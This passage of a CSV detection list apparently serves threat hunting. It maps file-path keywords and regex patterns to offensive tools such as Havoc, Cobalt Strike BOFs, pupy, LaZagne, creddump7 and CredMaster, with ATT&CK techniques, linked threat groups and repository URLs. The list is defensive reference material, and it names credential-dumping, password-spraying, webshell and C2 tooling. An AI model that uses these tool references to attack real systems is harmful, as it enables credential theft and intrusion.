T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cracked5pider/CoffeeLdr","1","1","N/A","N/A","10","10","286","38","2023-12-03T18:09:34Z","2022-07-18T15:21:11Z","6217" "*/Cracked5pider/*",".{0,1000}\/Cracked5pider\/.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","6218" 
"*/cracked-users.txt*",".{0,1000}\/cracked\-users\.txt.{0,1000}","offensive_tool_keyword","autoNTDS","autoNTDS is an automation script designed to simplify the process of dumping and cracking NTDS hashes using secretsdump.py and hashcat","T1003 - T1059 - T1021.002 - T1213","TA0006 - TA0008 - TA0005 - TA0002","N/A","N/A","Credential Access","https://github.com/hmaverickadams/autoNTDS","1","0","N/A","N/A","10","2","109","14","2023-10-31T22:03:58Z","2023-10-30T23:10:58Z","6219" "*/cracklord.git*",".{0,1000}\/cracklord\.git.{0,1000}","offensive_tool_keyword","cracklord","Queue and resource system for cracking passwords","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/jmmcatee/cracklord","1","1","N/A","N/A","10","4","388","70","2022-09-22T09:30:14Z","2013-12-09T23:10:54Z","6220" "*/cracklord/cmd/*",".{0,1000}\/cracklord\/cmd\/.{0,1000}","offensive_tool_keyword","cracklord","Queue and resource system for cracking passwords","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/jmmcatee/cracklord","1","1","N/A","N/A","10","4","388","70","2022-09-22T09:30:14Z","2013-12-09T23:10:54Z","6221" "*/CrackMapExec.git",".{0,1000}\/CrackMapExec\.git","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","6222" "*/crackmapexec/cme.conf*",".{0,1000}\/crackmapexec\/cme\.conf.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation 
tool","https://github.com/ThePorgs/Exegol","1","0","#linux","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","6223" "*/cradle.ps1*",".{0,1000}\/cradle\.ps1.{0,1000}","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/Metro-Holografix/DInjector","1","1","N/A","private github repo","10","1","N/A","N/A","N/A","N/A","6224" "*/cradle.ps1*",".{0,1000}\/cradle\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","6225" "*/Crassus.git*",".{0,1000}\/Crassus\.git.{0,1000}","offensive_tool_keyword","Crassus","Crassus Windows privilege escalation discovery tool","T1068 - T1003 - T1003.003 - T1046","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/vu-ls/Crassus","1","1","N/A","N/A","10","6","571","59","2024-11-08T14:11:39Z","2023-01-12T21:01:52Z","6226" "*/Crassus-main*",".{0,1000}\/Crassus\-main.{0,1000}","offensive_tool_keyword","Crassus","Crassus Windows privilege escalation discovery tool","T1068 - T1003 - T1003.003 - T1046","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/vu-ls/Crassus","1","1","N/A","N/A","10","6","571","59","2024-11-08T14:11:39Z","2023-01-12T21:01:52Z","6227" "*/crawler.py -u http*",".{0,1000}\/crawler\.py\s\-u\shttp.{0,1000}","offensive_tool_keyword","domain_analyzer","Analyze the security of any domain by finding all the information 
possible","T1560 - T1590 - T1200 - T1213 - T1057","TA0002 - TA0009","N/A","N/A","Reconnaissance","https://github.com/eldraco/domain_analyzer","1","0","N/A","N/A","6","10","1858","241","2022-12-29T10:57:33Z","2017-08-08T18:52:34Z","6228" "*/create_webshell_with_py.py*",".{0,1000}\/create_webshell_with_py\.py.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","6230" "*/createforestcache.py*",".{0,1000}\/createforestcache\.py.{0,1000}","offensive_tool_keyword","BloodHound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. 
Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/fox-it/BloodHound.py","1","1","N/A","N/A","10","10","2088","343","2025-03-28T11:19:13Z","2018-02-26T14:44:20Z","6231" "*/Create-HotKeyLNK.ps1*",".{0,1000}\/Create\-HotKeyLNK\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","6232" "*/createproxydll.sh*",".{0,1000}\/createproxydll\.sh.{0,1000}","offensive_tool_keyword","nimproxydll","A Docker container for byt3bl33d3r/NimDllSideload - DLL sideloading/proxying","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/cyllective/nimproxydll","1","1","N/A","N/A","9","1","10","0","2024-05-26T17:34:01Z","2024-03-15T15:15:45Z","6233" "*/createstager.py*",".{0,1000}\/createstager\.py.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","6234" "*/cred_dump.rc*",".{0,1000}\/cred_dump\.rc.{0,1000}","offensive_tool_keyword","TheFatRat","Easy tool to generate backdoor and easy tool to post exploitation attack like browser attack and dll.","T1027 - T1059 - T1105 - T1218","TA0002 - TA0003","N/A","N/A","Exploitation tool","https://github.com/Screetsec/TheFatRat","1","0","#linux","N/A","N/A","10","9941","2324","2024-03-17T12:09:38Z","2016-07-24T10:30:19Z","6235" "*/Cred_Dump.sh*",".{0,1000}\/Cred_Dump\.sh.{0,1000}","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation tool","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","1","N/A","N/A","10","8","707","112","2024-03-22T12:32:22Z","2022-03-23T15:52:41Z","6236" "*/credBandit/*",".{0,1000}\/credBandit\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that uses static x64 syscalls to perform a complete in memory dump of a process and send that back through your already existing Beacon communication channel","T1548.002 - T1548.003 - T1134.001 - T1134.003 - 
T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/xforcered/CredBandit","1","1","N/A","N/A","10","10","240","26","2021-07-14T17:42:41Z","2021-03-17T15:19:33Z","6237" "*/creddump.py*",".{0,1000}\/creddump\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - 
T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","6238" "*/creddump7*.py*",".{0,1000}\/creddump7.{0,1000}\.py.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1555 - T1555.001 - T1555.003 - T1555.004 - T1003.001 - T1003.004 - T1003.005 - T1003.007 - T1003.008 - T1552.001","TA0006 - TA0009","N/A","Akira - AvosLocker - LockBit - GoGoogle - 8BASE - RansomEXX - Leafminer - Wizard Spider - APT3 - Scattered Spider - OilRig - MuddyWater - Inception - APT33 - TeamTNT - Tonto Team - Evilnum - CHRYSENE - GOLD DUPONT","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","N/A","10","10","9941","2062","2025-04-10T14:24:35Z","2015-02-16T14:10:02Z","6239" "*/creddump7.git*",".{0,1000}\/creddump7\.git.{0,1000}","offensive_tool_keyword","creddump7","extracts various forms of credentials from Windows systems","T1003 - T1081 - T1040 - T1110 - T1555","TA0006 - TA0009","N/A","Sandworm","Credential Access","https://github.com/CiscoCXSecurity/creddump7","1","1","N/A","N/A","10","4","394","106","2020-10-02T13:25:16Z","2014-06-24T13:18:38Z","6240" "*/creddump7.git*",".{0,1000}\/creddump7\.git.{0,1000}","offensive_tool_keyword","creddump7","extracts various forms of credentials from Windows systems","T1003 - T1081 - T1040 - T1110 - T1555","TA0006 - TA0009","N/A","Sandworm","Credential 
Access","https://github.com/CiscoCXSecurity/creddump7","1","1","N/A","N/A","10","4","394","106","2020-10-02T13:25:16Z","2014-06-24T13:18:38Z","6241" "*/creddump7/*",".{0,1000}\/creddump7\/.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","N/A","10","1110","130","2025-03-24T10:23:58Z","2021-09-27T09:12:51Z","6242" "*/creddump7/*",".{0,1000}\/creddump7\/.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","6243" "*/creddump7/releases/*",".{0,1000}\/creddump7\/releases\/.{0,1000}","offensive_tool_keyword","creddump7","extracts various forms of credentials from Windows systems","T1003 - T1081 - T1040 - T1110 - T1555","TA0006 - TA0009","N/A","Sandworm","Credential Access","https://github.com/CiscoCXSecurity/creddump7","1","1","N/A","N/A","10","4","394","106","2020-10-02T13:25:16Z","2014-06-24T13:18:38Z","6244" "*/credential access.cna*",".{0,1000}\/credential\saccess\.cna.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - 
T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","6245" "*/Credentials/*.ccache*",".{0,1000}\/Credentials\/.{0,1000}\.ccache.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","6246" "*/credentials/enum_cred_store*",".{0,1000}\/credentials\/enum_cred_store.{0,1000}","offensive_tool_keyword","metasploit-payloads","shell payload","T1059.001 - T1027 - T1210.001","TA0002 - TA0003 - TA0007","N/A","N/A","Framework","https://github.com/rapid7/metasploit-payloads","1","0","#linux","N/A","10","10","1819","689","2025-02-13T15:01:44Z","2014-04-03T21:18:24Z","6247" "*/credentials/enum_laps*",".{0,1000}\/credentials\/enum_laps.{0,1000}","offensive_tool_keyword","metasploit-payloads","shell payload","T1059.001 - T1027 - T1210.001","TA0002 - TA0003 - TA0007","N/A","N/A","Framework","https://github.com/rapid7/metasploit-payloads","1","0","#linux","N/A","10","10","1819","689","2025-02-13T15:01:44Z","2014-04-03T21:18:24Z","6248" "*/Credentials/firefox_*.txt*",".{0,1000}\/Credentials\/firefox_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 
- T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","6249" "*/Credentials/msol_*.txt*",".{0,1000}\/Credentials\/msol_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","6250" "*/credentials/SudoSnatch*",".{0,1000}\/credentials\/SudoSnatch.{0,1000}","offensive_tool_keyword","sudoSnatch","sudoSnatch payload grabs sudo password in plain text and immediately after target uses sudo command and sends it back to attacker remotely/locally.","T1552.001 - T1056.001 - T1071.001","TA0006 - TA0004 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/SudoSnatch","1","1","#linux","N/A","10","10","904","310","2024-09-14T02:34:26Z","2021-09-08T20:33:18Z","6251" "*/credentials/wifigrabber*",".{0,1000}\/credentials\/wifigrabber.{0,1000}","offensive_tool_keyword","wifigrabber","grab wifi password and exfiltrate to a given site","T1056.005 - T1552.001 - T1119 - T1071.001","TA0004 - TA0006 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/wifigrabber","1","1","N/A","N/A","10","10","904","310","2024-09-14T02:34:26Z","2021-09-08T20:33:18Z","6252" "*/CredEnum.c*",".{0,1000}\/CredEnum\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - 
T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/guervild/BOFs","1","1","N/A","N/A","10","10","161","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z","6253" "*/CredEnum.cna*",".{0,1000}\/CredEnum\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 
- T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/guervild/BOFs","1","1","N/A","N/A","10","10","161","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z","6254" "*/CredEnum.h*",".{0,1000}\/CredEnum\.h.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker 
- Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/guervild/BOFs","1","1","N/A","N/A","10","10","161","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z","6255" "*/creditcards.py*",".{0,1000}\/creditcards\.py.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","6256" "*/CredMaster.git*",".{0,1000}\/CredMaster\.git.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004 - T1621","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","1","N/A","N/A","9","10","1070","142","2025-03-19T20:36:21Z","2020-09-25T20:57:42Z","6257" "*/credmaster.py*",".{0,1000}\/credmaster\.py.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004 - T1621","TA0006 - TA0043","N/A","N/A","Credential 
Access","https://github.com/knavesec/CredMaster","1","1","N/A","N/A","9","10","1070","142","2025-03-19T20:36:21Z","2020-09-25T20:57:42Z","6258" "*/credmaster.txt*",".{0,1000}\/credmaster\.txt.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004 - T1621","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","0","#linux","N/A","9","10","1070","142","2025-03-19T20:36:21Z","2020-09-25T20:57:42Z","6259" "*/CredMaster-master.zip*",".{0,1000}\/CredMaster\-master\.zip.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004 - T1621","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","1","N/A","N/A","9","10","1070","142","2025-03-19T20:36:21Z","2020-09-25T20:57:42Z","6260" "*/credmaster-success.txt*",".{0,1000}\/credmaster\-success\.txt.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004 - T1621","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","0","#linux","N/A","9","10","1070","142","2025-03-19T20:36:21Z","2020-09-25T20:57:42Z","6261" "*/credmaster-validusers.txt*",".{0,1000}\/credmaster\-validusers\.txt.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004 - T1621","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","0","#linux","N/A","9","10","1070","142","2025-03-19T20:36:21Z","2020-09-25T20:57:42Z","6262" 